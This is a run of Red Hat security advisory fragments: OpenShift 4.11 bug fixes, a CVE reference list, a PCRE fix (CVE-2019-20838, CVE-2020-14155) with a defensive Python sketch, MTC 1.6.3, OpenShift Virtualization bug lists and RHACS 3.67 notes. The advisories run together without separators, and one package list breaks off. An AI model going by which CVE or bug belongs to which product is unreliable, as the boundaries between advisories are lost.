- [4.11] Bootimage bump tracker 2093236 - DNS 
operator stopped reconciling after 4.10 to 4.11 upgrade | 4.11 nightly to 4.11 nightly upgrade 2093288 - Default catalogs fail liveness/readiness probes 2093357 - Upgrading sno spoke with acm-ice, causes the sno to get unreachable 2093368 - Installer orphans FIPs created for LoadBalancer Services on 'cluster destroy' 2093396 - Remove node-tainting for too-small MTU 2093445 - ManagementState reconciliation breaks SR 2093454 - Router proxy protocol doesn't work with dual-stack (IPv4 and IPv6) clusters 2093462 - Ingress Operator isn't reconciling the ingress cluster operator object 2093586 - Topology: Ctrl+space opens the quick search modal, but doesn't close it again 2093593 - Import from Devfile shows configuration options that shouldn't be there 2093597 - Import: Advanced option sentence is split into two parts and headlines have no padding 2093600 - Project access tab should apply new permissions before it deletes old ones 2093601 - Project access page doesn't allow the user to update the settings twice (without manually reloading the content) 2093783 - Should bump cluster-kube-descheduler-operator to kubernetes version V1.24 2093797 - 'oc registry login' with serviceaccount function needs update 2093819 - An etcd member for a new machine was never added to the cluster 2093930 - Gather console helm install totals metric 2093957 - Oc-mirror writes dup metadata to registry backend 2093986 - Podsecurity violation error getting logged for pod-identity-webhook 2093992 - Cluster version operator acknowledges upgrade failing on periodic-ci-openshift-release-master-nightly-4.11-e2e-metal-ipi-upgrade-ovn-ipv6 2094023 - Add Git Flow - Template Labels for Deployment show as DeploymentConfig 2094024 - bump oauth-apiserver deps to include 1.23.1 k8s that fixes etcd blips 2094039 - egressIP panics with nil pointer dereference 2094055 - Bump coreos-installer for s390x Secure Execution 2094071 - No runbook created for SouthboundStale alert 2094088 - Columns in NBDB may never be updated by 
OVNK 2094104 - Demo dynamic plugin image tests should be skipped when testing console-operator 2094152 - Alerts in the virtualization overview status card aren't filtered 2094196 - Add default and validating webhooks for Power VS MAPI 2094227 - Topology: Create Service Binding should not be the last option (even under delete) 2094239 - custom pool Nodes with 0 nodes are always populated in progress bar 2094303 - If og is configured with sa, operator installation will fail. 2094335 - [Nutanix] - debug logs are enabled by default in machine-controller 2094342 - apirequests limits of Cluster CAPI Operator are too low for Azure platform 2094438 - Make AWS URL parsing more lenient for GetNodeEgressIPConfiguration 2094525 - Allow automatic upgrades for efs operator 2094532 - ovn-windows CI jobs are broken 2094675 - PTP Dual Nic | Extend Events 4.11 - when killing phc2sys we get a notification that the ptp4l physical master moved to free run 2094694 - [Nutanix] No cluster name sanity validation - cluster name with a dot (".") character 2094704 - Verbose log activated on kube-rbac-proxy in deployment prometheus-k8s 2094801 - Kuryr controller keeps restarting when handling IPs with leading zeros 2094806 - Machine API oVirt component should use K8s 1.24 dependencies 2094816 - Kuryr controller restarts when over quota 2094833 - Repository overview page does not show default PipelineRun template for developer user 2094857 - CloudShellTerminal loops indefinitely if DevWorkspace CR goes into failed state 2094864 - Rebase CAPG to latest changes 2094866 - oc-mirror does not always delete all manifests associated with an image during pruning 2094896 - Run 'openshift-install agent create image' has segfault exception if cluster-manifests directory missing 2094902 - Fix installer cross-compiling 2094932 - MGMT-10403 Ingress should enable single-node cluster expansion on upgraded clusters 2095049 - managed-csi StorageClass does not create PVs 2095071 - Backend tests fail after 
devfile registry update 2095083 - Observe > Dashboards: Graphs may change a lot on automatic refresh 2095110 - [ovn] northd container termination script must use bash 2095113 - [ovnkube] bump to openvswitch2.17-2.17.0-22.el8fdp 2095226 - Added changes to verify cloud connection and dhcpservices quota of a powervs instance 2095229 - ingress-operator pod in CrashLoopBackOff in 4.11 after upgrade starting in 4.6 due to go panic 2095231 - Kafka Sink sidebar in topology is empty 2095247 - Event sink form doesn't show channel as sink until app is refreshed 2095248 - [vSphere-CSI-Driver] does not report volume count limits correctly, so pods with multiple volumes may be scheduled to nodes that do not satisfy the volume count limit 2095256 - Samples Owner needs to be Updated 2095264 - ovs-configuration.service fails with Error: Failed to modify connection 'ovs-if-br-ex': failed to update connection: error writing to file '/etc/NetworkManager/systemConnectionsMerged/ovs-if-br-ex.nmconnection' 2095362 - oVirt CSI driver operator should use latest go-ovirt-client 2095574 - e2e-agnostic CI job fails 2095687 - Debug Container shown for build logs and on click ui breaks 2095703 - machinedeletionhooks doesn't work in vsphere cluster and BM cluster 2095716 - New PSA component for Pod Security Standards enforcement is refusing openshift-operators ns 2095756 - CNO panics with concurrent map read/write 2095772 - Memory requests for ovnkube-master containers are over-sized 2095917 - Nutanix set osDisk with diskSizeGB rather than diskSizeMiB 2095941 - DNS Traffic not kept local to zone or node when Calico SDN utilized 2096053 - Builder Image icons in Git Import flow are hard to see in Dark mode 2096226 - crio fails to bind to tentative IP, causing service failure since RHOCS was rebased on RHEL 8.6 2096315 - NodeClockNotSynchronising alert's severity should be critical 2096350 - Web console doesn't display webhook errors for upgrades 2096352 - Collect whole journal in gather 2096380 - acm-simple-kmod 
references deprecated KVC example 2096392 - Topology node icons are not properly visible in Dark mode 2096394 - Add page Card items background color does not match with column background color in Dark mode 2096413 - br-ex not created due to default bond interface having a different mac address than expected 2096496 - FIPS issue on OCP SNO with RT Kernel via performance profile 2096605 - [vsphere] no validation checking for diskType 2096691 - [Alibaba 4.11] Specifying ResourceGroup id in install-config.yaml, New pv are still getting created to default ResourceGroups 2096855 - 'oc adm release new' failed with error when using an existing multi-arch release image as input 2096905 - Openshift installer should not use the prism client embedded in nutanix terraform provider 2096908 - Dark theme issue in pipeline builder, Helm rollback form, and Git import 2097000 - KafkaConnections disappear from Topology after creating KafkaSink in Topology 2097043 - No clean way to specify operand issues to KEDA OLM operator 2097047 - MetalLB: matchExpressions used in CR like L2Advertisement, BGPAdvertisement, BGPPeers allow duplicate entries 2097067 - ClusterVersion history pruner does not always retain initial completed update entry 2097153 - poor performance on API call to vCenter ListTags with thousands of tags 2097186 - PSa autolabeling in 4.11 env upgraded from 4.10 does not work due to missing RBAC objects 2097239 - Change Lower CPU limits for Power VS cloud 2097246 - Kuryr: verify and unit jobs failing due to upstream OpenStack dropping py36 support 2097260 - openshift-install create manifests failed for Power VS platform 2097276 - MetalLB CI deploys the operator via manifests and not using the csv 2097282 - chore: update external-provisioner to the latest upstream release 2097283 - chore: update external-snapshotter to the latest upstream release 2097284 - chore: update external-attacher to the latest upstream release 2097286 - chore: update node-driver-registrar to the latest 
upstream release 2097334 - oc plugin help shows 'kubectl' 2097346 - Monitoring must-gather doesn't seem to be working anymore in 4.11 2097400 - Shared Resource CSI Driver needs additional permissions for validation webhook 2097454 - Placeholder bug for OCP 4.11.0 metadata release 2097503 - chore: rebase against latest external-resizer 2097555 - IngressControllersNotUpgradeable: load balancer service has been modified; changes must be reverted before upgrading 2097607 - Add Power VS support to Webhooks tests in actuator e2e test 2097685 - Ironic-agent can't restart because of existing container 2097716 - settings under httpConfig is dropped with AlertmanagerConfig v1beta1 2097810 - Required Network tools missing for Testing e2e PTP 2097832 - clean up unused IPv6DualStackNoUpgrade feature gate 2097940 - openshift-install destroy cluster traps if vpcRegion not specified 2097954 - 4.11 installation failed at monitoring and network clusteroperators with error "conmon: option parsing failed: Unknown option --log-global-size-max" making all jobs fail 2098172 - oc-mirror does not validate the registry in the storage config 2098175 - invalid license in python-dataclasses-0.8-2.el8 spec 2098177 - python-pint-0.10.1-2.el8 has unused Patch0 in spec file 2098242 - typo in SRO specialresourcemodule 2098243 - Add error check to Platform create for Power VS 2098392 - [OCP 4.11] Ironic cannot match "wwn" rootDeviceHint for a multipath device 2098508 - Control-plane-machine-set-operator reports panic 2098610 - No need to check the push permission with 'manifests-only' option 2099293 - oVirt cluster API provider should use latest go-ovirt-client 2099330 - Edit application grouping is shown to user with view only access in a cluster 2099340 - CAPI e2e tests for AWS are missing 2099357 - ovn-kubernetes needs explicit RBAC coordination leases for 1.24 bump 2099358 - Dark mode+Topology update: Unexpected selected+hover border and background colors for app groups 2099528 - Layout issue: 
No spacing in delete modals 2099561 - Prometheus returns HTTP 500 error on /favicon.ico 2099582 - Format and update Repository overview content 2099611 - Failures on etcd-operator watch channels 2099637 - Should print error when using --keep-manifest-list=false for manifestlist image 2099654 - Topology performance: Endless rerender loop when showing a Http EventSink (KameletBinding) 2099668 - KubeControllerManager should degrade when GC stops working 2099695 - Update CAPG after rebase 2099751 - specialresourcemodule stacktrace while looping over build status 2099755 - EgressIP node's mgmtIP reachability configuration option 2099763 - Update icons for event sources and sinks in topology, Add page, and context menu 2099811 - UDP Packet loss in OpenShift using IPv6 [upcall] 2099821 - exporting a pointer for the loop variable 2099875 - The speaker won't start if there's another component on the host listening on 8080 2099899 - oc-mirror looks for layers in the wrong repository when searching for release images during publishing 2099928 - [FJ OCP4.11 Bug]: Add unit tests to image_customization_test file 2099968 - [Azure-File-CSI] failed to provision volume in ARO cluster 2100001 - Sync upstream v1.22.0 downstream 2100007 - Run bundle-upgrade failed from the traditional File-Based Catalog installed operator 2100033 - OCP 4.11 IPI - Some csr remain "Pending" post deployment 2100038 - failure to update special-resource-lifecycle table during update Event 2100079 - SDN needs explicit RBAC coordination leases for 1.24 bump 2100138 - release info --bugs has no differentiator between Jira and Bugzilla 2100155 - kube-apiserver-operator should raise an alert when there is a Pod Security admission violation 2100159 - Dark theme: Build icon for pending status is not inverted in topology sidebar 2100323 - SQLite-based catsrc cannot be ready due to "Error: open ./db-xxxx: permission denied" 2100347 - KASO retains old config values when switching from Medium/Default to empty worker 
latency profile 2100356 - Remove Condition tab and create option from console as it is deprecated in OSP-1.8 2100439 - [gce-pd] GCE PD in-tree storage plugin tests not running 2100496 - [OCPonRHV]-oVirt API returns affinity groups without a description field 2100507 - Remove redundant log lines from obj_retry.go 2100536 - Update API to allow EgressIP node reachability check 2100601 - Update CNO to allow EgressIP node reachability check 2100643 - [Migration] [GCP] OVN can not rollback to SDN 2100644 - openshift-ansible FTBFS on RHEL8 2100669 - Telemetry should not log the full path if it contains a username 2100749 - [OCP 4.11] multipath support needs multipath modules 2100825 - Update machine-api-powervs go modules to latest version 2100841 - tiny openshift-install usability fix for setting KUBECONFIG 2101460 - An etcd member for a new machine was never added to the cluster 2101498 - Revert Bug 2082599: add upper bound to number of failed attempts 2102086 - The base image is still 4.10 for operator-sdk 1.22 2102302 - Dummy bug for 4.10 backports 2102362 - Valid regions should be allowed in GCP install config 2102500 - Kubernetes NMState pods can not evict due to PDB on an SNO cluster 2102639 - Drain happens before other image-registry pod is ready to service requests, causing disruption 2102782 - topolvm-controller get into CrashLoopBackOff few minutes after install 2102834 - [cloud-credential-operator] container has runAsNonRoot and image will run as root 2102947 - [VPA] recommender is logging errors for pods with init containers 2103053 - [4.11] Backport Prow CI improvements from master 2103075 - Listing secrets in all namespaces with a specific labelSelector does not work properly 2103080 - br-ex not created due to default bond interface having a different mac address than expected 2103177 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces 2103728 - Carry HAProxy patch 'BUG/MEDIUM: h2: match absolute-path not 
path-absolute for :path' 2103749 - MachineConfigPool is not getting updated 2104282 - heterogeneous arch: oc adm extract encodes arch specific release payload pullspec rather than the manifestlisted pullspec 2104432 - [dpu-network-operator] Updating images to be consistent with ART 2104552 - kube-controller-manager operator 4.11.0-rc.0 degraded on disabled monitoring stack 2104561 - 4.10 to 4.11 update: Degraded node: unexpected on-disk state: mode mismatch for file: "/etc/crio/crio.conf.d/01-ctrcfg-pidsLimit"; expected: -rw-r--r--/420/0644; received: ----------/0/0 2104589 - must-gather namespace should have 'privileged' warn and audit pod security labels besides enforce 2104701 - In CI 4.10 HAProxy must-gather takes longer than 10 minutes 2104717 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory address or nil pointer dereference" 2104727 - Bootstrap node should honor http proxy 2104906 - Uninstall fails with Observed a panic: runtime.boundsError 2104951 - Web console doesn't display webhook errors for upgrades 2104991 - Completed pods may not be correctly cleaned up 2105101 - NodeIP is used instead of EgressIP if egressPod is recreated within 60 seconds 2105106 - co/node-tuning: Waiting for 15/72 Profiles to be applied 2105146 - Degraded=True noise with: UpgradeBackupControllerDegraded: unable to retrieve cluster version, no completed update was found in cluster version status history 2105167 - BuildConfig throws error when using a label with a / in it 2105334 - vmware-vsphere-csi-driver-controller can't use host port error on e2e-vsphere-serial 2105382 - Add a validation webhook for Nutanix machine provider spec in Machine API Operator 2105468 - The ccoctl does not seem to know how to leverage the VMs service account to talk to GCP APIs. 
2105937 - telemeter golangci-lint outdated blocking ART PRs that update to Go1.18 2106051 - Unable to deploy acm-ice using latest SRO 4.11 build 2106058 - vSphere defaults to SecureBoot on; breaks installation of out-of-tree drivers [4.11.0] 2106062 - [4.11] Bootimage bump tracker 2106116 - IngressController spec.tuningOptions.healthCheckInterval validation allows invalid values such as "0abc" 2106163 - Samples ImageStreams vs. registry.redhat.io: unsupported: V2 schema 1 manifest digests are no longer supported for image pulls 2106313 - bond-cni: backport bond-cni GA items to 4.11 2106543 - Typo in must-gather release-4.10 2106594 - crud/other-routes.spec.ts Cypress test failing at a high rate in CI 2106723 - [4.11] Upgrade from 4.11.0-rc0 -> 4.11.0-rc.1 failed. rpm-ostree status shows No space left on device 2106855 - [4.11.z] externalTrafficPolicy=Local is not working in local gateway mode if ovnkube-node is restarted 2107493 - ReplicaSet prometheus-operator-admission-webhook has timed out progressing 2107501 - metallb greenwave tests failure 2107690 - Driver Container builds fail with "error determining starting point for build: no FROM statement found" 2108175 - etcd backup seems to not be triggered in 4.10.18-->4.10.20 upgrade 2108617 - [oc adm release] extraction of the installer against a manifestlisted payload referenced by tag leads to a bad release image reference 2108686 - rpm-ostreed: start limit hit easily 2110505 - [Upgrade] deployment openshift-machine-api/machine-api-operator has a replica failure FailedCreate 2110715 - openshift-controller-manager(-operator) namespace should clear run-level annotations 2111055 - dummy bug for 4.10.z bz2110938
- References:
https://access.redhat.com/security/cve/CVE-2018-25009 https://access.redhat.com/security/cve/CVE-2018-25010 https://access.redhat.com/security/cve/CVE-2018-25012 https://access.redhat.com/security/cve/CVE-2018-25013 https://access.redhat.com/security/cve/CVE-2018-25014 https://access.redhat.com/security/cve/CVE-2018-25032 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-17541 https://access.redhat.com/security/cve/CVE-2020-19131 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-28493 https://access.redhat.com/security/cve/CVE-2020-35492 https://access.redhat.com/security/cve/CVE-2020-36330 https://access.redhat.com/security/cve/CVE-2020-36331 https://access.redhat.com/security/cve/CVE-2020-36332 https://access.redhat.com/security/cve/CVE-2021-3481 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3634 https://access.redhat.com/security/cve/CVE-2021-3672 https://access.redhat.com/security/cve/CVE-2021-3695 https://access.redhat.com/security/cve/CVE-2021-3696 https://access.redhat.com/security/cve/CVE-2021-3697 https://access.redhat.com/security/cve/CVE-2021-3737 https://access.redhat.com/security/cve/CVE-2021-4115 https://access.redhat.com/security/cve/CVE-2021-4156 https://access.redhat.com/security/cve/CVE-2021-4189 https://access.redhat.com/security/cve/CVE-2021-20095 https://access.redhat.com/security/cve/CVE-2021-20231 
https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-23177 https://access.redhat.com/security/cve/CVE-2021-23566 https://access.redhat.com/security/cve/CVE-2021-23648 https://access.redhat.com/security/cve/CVE-2021-25219 https://access.redhat.com/security/cve/CVE-2021-31535 https://access.redhat.com/security/cve/CVE-2021-31566 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-38185 https://access.redhat.com/security/cve/CVE-2021-38593 https://access.redhat.com/security/cve/CVE-2021-40528 https://access.redhat.com/security/cve/CVE-2021-41190 https://access.redhat.com/security/cve/CVE-2021-41617 https://access.redhat.com/security/cve/CVE-2021-42771 https://access.redhat.com/security/cve/CVE-2021-43527 https://access.redhat.com/security/cve/CVE-2021-43818 https://access.redhat.com/security/cve/CVE-2021-44225 https://access.redhat.com/security/cve/CVE-2021-44906 https://access.redhat.com/security/cve/CVE-2022-0235 https://access.redhat.com/security/cve/CVE-2022-0778 https://access.redhat.com/security/cve/CVE-2022-1012 https://access.redhat.com/security/cve/CVE-2022-1215 https://access.redhat.com/security/cve/CVE-2022-1271 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1621 https://access.redhat.com/security/cve/CVE-2022-1629 https://access.redhat.com/security/cve/CVE-2022-1706 https://access.redhat.com/security/cve/CVE-2022-1729 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-21698 https://access.redhat.com/security/cve/CVE-2022-22576 https://access.redhat.com/security/cve/CVE-2022-23772 
https://access.redhat.com/security/cve/CVE-2022-23773 https://access.redhat.com/security/cve/CVE-2022-23806 https://access.redhat.com/security/cve/CVE-2022-24407 https://access.redhat.com/security/cve/CVE-2022-24675 https://access.redhat.com/security/cve/CVE-2022-24903 https://access.redhat.com/security/cve/CVE-2022-24921 https://access.redhat.com/security/cve/CVE-2022-25313 https://access.redhat.com/security/cve/CVE-2022-25314 https://access.redhat.com/security/cve/CVE-2022-26691 https://access.redhat.com/security/cve/CVE-2022-26945 https://access.redhat.com/security/cve/CVE-2022-27191 https://access.redhat.com/security/cve/CVE-2022-27774 https://access.redhat.com/security/cve/CVE-2022-27776 https://access.redhat.com/security/cve/CVE-2022-27782 https://access.redhat.com/security/cve/CVE-2022-28327 https://access.redhat.com/security/cve/CVE-2022-28733 https://access.redhat.com/security/cve/CVE-2022-28734 https://access.redhat.com/security/cve/CVE-2022-28735 https://access.redhat.com/security/cve/CVE-2022-28736 https://access.redhat.com/security/cve/CVE-2022-28737 https://access.redhat.com/security/cve/CVE-2022-29162 https://access.redhat.com/security/cve/CVE-2022-29810 https://access.redhat.com/security/cve/CVE-2022-29824 https://access.redhat.com/security/cve/CVE-2022-30321 https://access.redhat.com/security/cve/CVE-2022-30322 https://access.redhat.com/security/cve/CVE-2022-30323 https://access.redhat.com/security/cve/CVE-2022-32250 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.

- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
PCRE is a Perl-compatible regular expression library.
Security Fix(es):
- pcre: Buffer over-read in JIT when UTF is disabled and \X or \R has fixed quantifier greater than 1 (CVE-2019-20838)
- pcre: Integer overflow when parsing callout numeric arguments (CVE-2020-14155)
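CVE-2020-14155 is an integer-overflow class of bug: the number after "(?C" in a PCRE callout could exceed the range of the integer used to store it. The sketch below is illustrative Python only, not PCRE's actual C source; the function name and return shape are invented for the example, and it simply shows the kind of range check that a hardened parser applies.

```python
# Illustrative sketch only -- not PCRE source code. CVE-2020-14155 involved
# a large number after "(?C" overflowing the integer holding the callout
# argument; the safe behaviour is to reject out-of-range values.

INT32_MAX = 2**31 - 1  # a C "int" on common platforms

def parse_callout_number(pattern: str, pos: int):
    """Parse the digits of a "(?Cnnn)" callout starting at index pos.

    Returns (value, next_pos), or raises ValueError if the number is
    missing or would overflow a 32-bit signed integer.
    """
    value = 0
    start = pos
    while pos < len(pattern) and pattern[pos].isdigit():
        value = value * 10 + int(pattern[pos])
        if value > INT32_MAX:  # overflow guard: reject instead of wrapping
            raise ValueError("callout number too large")
        pos += 1
    if pos == start:
        raise ValueError("missing callout number")
    return value, pos

# A benign callout parses fine; an oversized one is rejected.
print(parse_callout_number("(?C255)", 3))  # -> (255, 6)
```

Without the guard, `value` would silently wrap in C, which is the root cause the upstream 8.44 fix addresses.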
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.5 Release Notes linked from the References section.

- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1848436 - CVE-2020-14155 pcre: Integer overflow when parsing callout numeric arguments
1848444 - CVE-2019-20838 pcre: Buffer over-read in JIT when UTF is disabled and \X or \R has fixed quantifier greater than 1
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: pcre-8.42-6.el8.src.rpm
aarch64:
pcre-8.42-6.el8.aarch64.rpm
pcre-cpp-8.42-6.el8.aarch64.rpm
pcre-cpp-debuginfo-8.42-6.el8.aarch64.rpm
pcre-debuginfo-8.42-6.el8.aarch64.rpm
pcre-debugsource-8.42-6.el8.aarch64.rpm
pcre-devel-8.42-6.el8.aarch64.rpm
pcre-tools-debuginfo-8.42-6.el8.aarch64.rpm
pcre-utf16-8.42-6.el8.aarch64.rpm
pcre-utf16-debuginfo-8.42-6.el8.aarch64.rpm
pcre-utf32-8.42-6.el8.aarch64.rpm
pcre-utf32-debuginfo-8.42-6.el8.aarch64.rpm

ppc64le:
pcre-8.42-6.el8.ppc64le.rpm
pcre-cpp-8.42-6.el8.ppc64le.rpm
pcre-cpp-debuginfo-8.42-6.el8.ppc64le.rpm
pcre-debuginfo-8.42-6.el8.ppc64le.rpm
pcre-debugsource-8.42-6.el8.ppc64le.rpm
pcre-devel-8.42-6.el8.ppc64le.rpm
pcre-tools-debuginfo-8.42-6.el8.ppc64le.rpm
pcre-utf16-8.42-6.el8.ppc64le.rpm
pcre-utf16-debuginfo-8.42-6.el8.ppc64le.rpm
pcre-utf32-8.42-6.el8.ppc64le.rpm
pcre-utf32-debuginfo-8.42-6.el8.ppc64le.rpm

s390x:
pcre-8.42-6.el8.s390x.rpm
pcre-cpp-8.42-6.el8.s390x.rpm
pcre-cpp-debuginfo-8.42-6.el8.s390x.rpm
pcre-debuginfo-8.42-6.el8.s390x.rpm
pcre-debugsource-8.42-6.el8.s390x.rpm
pcre-devel-8.42-6.el8.s390x.rpm
pcre-tools-debuginfo-8.42-6.el8.s390x.rpm
pcre-utf16-8.42-6.el8.s390x.rpm
pcre-utf16-debuginfo-8.42-6.el8.s390x.rpm
pcre-utf32-8.42-6.el8.s390x.rpm
pcre-utf32-debuginfo-8.42-6.el8.s390x.rpm

x86_64:
pcre-8.42-6.el8.i686.rpm
pcre-8.42-6.el8.x86_64.rpm
pcre-cpp-8.42-6.el8.i686.rpm
pcre-cpp-8.42-6.el8.x86_64.rpm
pcre-cpp-debuginfo-8.42-6.el8.i686.rpm
pcre-cpp-debuginfo-8.42-6.el8.x86_64.rpm
pcre-debuginfo-8.42-6.el8.i686.rpm
pcre-debuginfo-8.42-6.el8.x86_64.rpm
pcre-debugsource-8.42-6.el8.i686.rpm
pcre-debugsource-8.42-6.el8.x86_64.rpm
pcre-devel-8.42-6.el8.i686.rpm
pcre-devel-8.42-6.el8.x86_64.rpm
pcre-tools-debuginfo-8.42-6.el8.i686.rpm
pcre-tools-debuginfo-8.42-6.el8.x86_64.rpm
pcre-utf16-8.42-6.el8.i686.rpm
pcre-utf16-8.42-6.el8.x86_64.rpm
pcre-utf16-debuginfo-8.42-6.el8.i686.rpm
pcre-utf16-debuginfo-8.42-6.el8.x86_64.rpm
pcre-utf32-8.42-6.el8.i686.rpm
pcre-utf32-8.42-6.el8.x86_64.rpm
pcre-utf32-debuginfo-8.42-6.el8.i686.rpm
pcre-utf32-debuginfo-8.42-6.el8.x86_64.rpm
Red Hat Enterprise Linux CRB (v. 8):

Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Summary:
The Migration Toolkit for Containers (MTC) 1.6.3 is now available.

- Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.

- Bugs fixed (https://bugzilla.redhat.com/):
2019088 - "MigrationController" CR displays syntax error when unquiescing applications
2021666 - Route name longer than 63 characters causes direct volume migration to fail
2021668 - "MigrationController" CR ignores the "cluster_subdomain" value for direct volume migration routes
2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image
2027196 - "migration-controller" pod goes into "CrashLoopBackoff" state if an invalid registry route is entered on the "Clusters" page of the web console
2027382 - "Copy oc describe/oc logs" window does not close automatically after timeout
2028841 - "rsync-client" container fails during direct volume migration with "Address family not supported by protocol" error
2031793 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "includedResources" resource
2039852 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "destMigClusterRef" or "srcMigClusterRef"
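Several of the bugs above reference fields of the "MigPlan" custom resource ("includedResources", "srcMigClusterRef", "destMigClusterRef"). For orientation, a minimal MigPlan sketch follows; the names and the namespace list are hypothetical placeholders, and the field layout follows the MTC documentation rather than anything stated in this advisory.

```yaml
apiVersion: migration.openshift.io/v1alpha1
kind: MigPlan
metadata:
  name: example-migplan            # hypothetical name
  namespace: openshift-migration
spec:
  srcMigClusterRef:                # reference to the source MigCluster
    name: source-cluster           # hypothetical name
    namespace: openshift-migration
  destMigClusterRef:               # reference to the destination MigCluster
    name: host
    namespace: openshift-migration
  migStorageRef:                   # replication repository for the migration
    name: example-migstorage       # hypothetical name
    namespace: openshift-migration
  namespaces:                      # namespaces to migrate
    - example-app                  # hypothetical namespace
```

Per bugs 2031793 and 2039852, an invalid value in these reference fields previously sent the "migration-controller" pod into "CrashLoopBackOff"; MTC 1.6.3 handles such input gracefully.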
- Bugs fixed (https://bugzilla.redhat.com/):
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet
1997017 - unprivileged client fails to get guest agent data
1998855 - Node drain: Sometimes source virt-launcher pod status is Failed and not Completed
2000251 - RoleBinding and ClusterRoleBinding brought in by kubevirt does not get reconciled when kind is ServiceAccount
2001270 - [VMIO] [Warm from Vmware] Snapshot files are not deleted after Successful Import
2001281 - [VMIO] [Warm from VMware] Source VM should not be turned ON if vmio import is removed
2001901 - [4.8.3] NNCP creation failures after nmstate-handler pod deletion
2007336 - 4.8.3 containers
2007776 - Failed to Migrate Windows VM with CDROM (readonly)
2008511 - [CNV-4.8.3] VMI is in LiveMigrate loop when Upgrading Cluster from 2.6.7/4.7.32 to OCP 4.8.13
2012890 - With descheduler during multiple VMIs migrations, some VMs are restarted
2025475 - [4.8.3] Upgrade from 2.6 to 4.x versions failed due to vlan-filtering issues
2026881 - [4.8.3] vlan-filtering is getting applied on veth ports
- Description:
The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:
OpenShift Dedicated support
RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform.

Use OpenShift OAuth server as an identity provider

If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS.

Enhancements for CI outputs

Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds.

Runtime Class policy criteria

Users can now use RHACS to define the container runtime configuration that may be used to run a pod’s containers using the Runtime Class policy criteria.
Bug Fixes The release of RHACS 3.67 includes the following bug fixes:
- Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed.
- Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of the apk package in the image rather than the apk-tools package. This issue has been fixed.
System changes The release of RHACS 3.67 includes the following system changes:
- Scanner now identifies vulnerabilities in Ubuntu 21.10 images.
- The Port exposure method policy criteria now include route as an exposure method.
- The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation.
- The OpenShift Compliance Operator integration now supports using TailoredProfiles.
- The RHACS Jenkins plugin now provides additional security information.
- When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values.
- The default uid:gid pair for the Scanner image is now 65534:65534.
- RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes.
- In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode.
- You can now format the output of the following roxctl CLI commands in table, csv, or JSON format: image scan, image check & deployment check
- You can now use a regular expression for the deployment name while specifying policy exclusions.
- Solution:
To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67.

- Bugs fixed (https://bugzilla.redhat.com/):
1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe
1978144 - CVE-2021-32690 helm: information disclosure vulnerability
1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet
1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function
2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability
